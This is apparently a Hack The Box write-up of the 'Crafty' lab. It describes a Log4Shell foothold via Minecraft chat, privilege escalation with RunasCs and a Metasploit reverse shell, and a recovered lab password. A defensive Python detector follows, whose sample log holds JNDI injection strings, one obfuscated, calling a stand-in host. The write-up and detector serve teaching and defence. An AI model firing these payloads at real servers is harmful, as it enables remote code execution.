Crafty
Platform: Hack The Box
Category/Tags: Windows, CVE, Log4j
Difficulty: Easy

Recon
To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.
As usual, I start with an nmap scan. I scan all ports, which reveals an open port besides port 80.

Open ports
Port 80 - http
Port 25565 - Minecraft server, version 1.16.5
The landing page has a Minecraft-inspired design.

I did some web directory fuzzing for hidden directories and subdomain enumeration, and even searched for a Microsoft IIS 10.0 exploit, but had no luck. So I figured that play.crafty.htb was the Minecraft server, where we could do some exploration.
Foothold
I have a wild guess that this is a Log4j vulnerability, since Minecraft is one of the services affected by that zero-day.
I used TLauncher (make sure to use the exact version, 1.16.5) to join the server. I tried to send messages to other players, and it worked as usual (but the server is a bit crap). So I searched for a Log4j exploit and stumbled upon the repository log4j-shell-poc and explored how it works. Before I begin, I change the cmd value in poc.py to "cmd".
To set up a listener:
To launch the exploit:
Now I get the output:

Copy the payload next to “Send me:” (this is the JNDI injection payload that can lead to RCE).
Paste it into the chat:

Gotcha, we have a response:

Now I check my Netcat listener, and I have a shell. The user flag is on the desktop.

Privilege Escalation
This part was the hardest for me, because I tried various tools to gain Administrator privileges.
In c:\Users\svc_minecraft\server\plugins, I found the .jar file:

I can’t decompile it using the jar command, so I looked for the Java bin directory. I came across C:\Program Files\Java\jdk1.8.0_171\bin, where jar.exe and javap.exe can be used to inspect the contents of the jar file. So, to decompile the file on the desktop:
I also read all the class files using javap.exe, and I found the string “s67u84zKq8IXw”, which might be useful for gaining administrator privileges.

So I tried tools like evil-winrm, but again, no luck. Then someone on the forum gave a hint that maybe we can use RunasCs, a utility to execute commands as a higher-privileged user. So I tried that: I started an HTTP server to transfer RunasCs.exe to the machine.
On the remote machine, I download the file:
To check whether we can log in as Administrator with the string “s67u84zKq8IXw” as the password and execute commands:

You can now read the root flag in Administrator/Desktop, but I want a shell with administrator privileges. In the forum, they also hinted that we can use Metasploit (which, as of yet, I don’t know how to use, but I am great at searching, so I proceed 😄).
I made a payload using Metasploit, with my listening address and port, and output it as an exe file.
On the remote machine, I download the file:
Then I started the reverse TCP handler to establish the connection and get the shell:

On the remote machine, I run runascs.exe to get Administrator privileges and exp.exe, our payload, to get the reverse shell as Administrator.
Here it is, I successfully got the shell:

Mitigation
Update or patch the Log4j library to the latest version that includes the fix for this vulnerability.
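The Log4Shell path used above runs through chat messages, which the server writes to its log via Log4j, so besides patching, a defender can watch the server log for lookup syntax in player chat. The script below is an added example (not from the original write-up or from any project it mentions); its log lines, player names and addresses are constructed, and it treats any complete ${...} lookup in a player message as suspicious, raising the severity for a jndi: prefix or nested lookups.

```python
import re
from typing import Optional

# Constructed Minecraft-style server log (not from the write-up); players, addresses and
# messages are made up. Chat is logged through Log4j, so a lookup pasted into chat lands here.
SAMPLE_LOG = """\
[12:00:01] [Server thread/INFO]: steve joined the game
[12:00:09] [Server thread/INFO]: <alex> ${jndi:ldap://198.51.100.7:1389/a}
[12:00:12] [Server thread/INFO]: <alex> ${${lower:j}ndi:rmi://198.51.100.7:1099/b}
[12:00:15] [Server thread/INFO]: <steve> that ${lookup} thing is scary
[12:00:18] [Server thread/INFO]: <alex> gg ${unterminated
"""

# Chat lines have the shape: [HH:MM:SS] [Server thread/INFO]: <player> message
CHAT_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[[^\]]+/INFO\]: <([^>]+)> (.*)$")
# An innermost lookup: ${...} whose body contains no further $, { or }
INNER_LOOKUP = re.compile(r"\$\{[^${}]*\}")

def lookup_depth(text: str) -> int:
    """Nesting depth of complete ${...} lookups; an unterminated '${' is ignored, as Log4j would."""
    depth = 0
    while INNER_LOOKUP.search(text):
        text = INNER_LOOKUP.sub("\x00", text)  # collapse one nesting level
        depth += 1
    return depth

def classify(message: str) -> Optional[str]:
    """Any complete lookup in chat is 'medium'; 'jndi:' or nested (obfuscated) lookups are 'high'."""
    depth = lookup_depth(message)
    if depth == 0:
        return None
    flat = re.sub(r"\s+", "", message).lower()
    return "high" if ("jndi:" in flat or depth > 1) else "medium"

def scan(log_text: str) -> list[tuple[str, str, str, str]]:
    """Return (time, player, severity, message) for each suspicious player chat line."""
    alerts = []
    for line in log_text.splitlines():
        m = CHAT_RE.match(line)
        if not m:
            continue  # joins, deaths, server notices: not player-controlled text
        time, player, message = m.groups()
        severity = classify(message)
        if severity:
            alerts.append((time, player, severity, message))
    return alerts

if __name__ == "__main__":
    for time, player, severity, message in scan(SAMPLE_LOG):
        print(f"{time} {severity.upper():<6} <{player}> {message}")
```

Running it against the constructed log yields two high alerts for alex and one medium for steve; the unterminated lookup and the join message produce nothing.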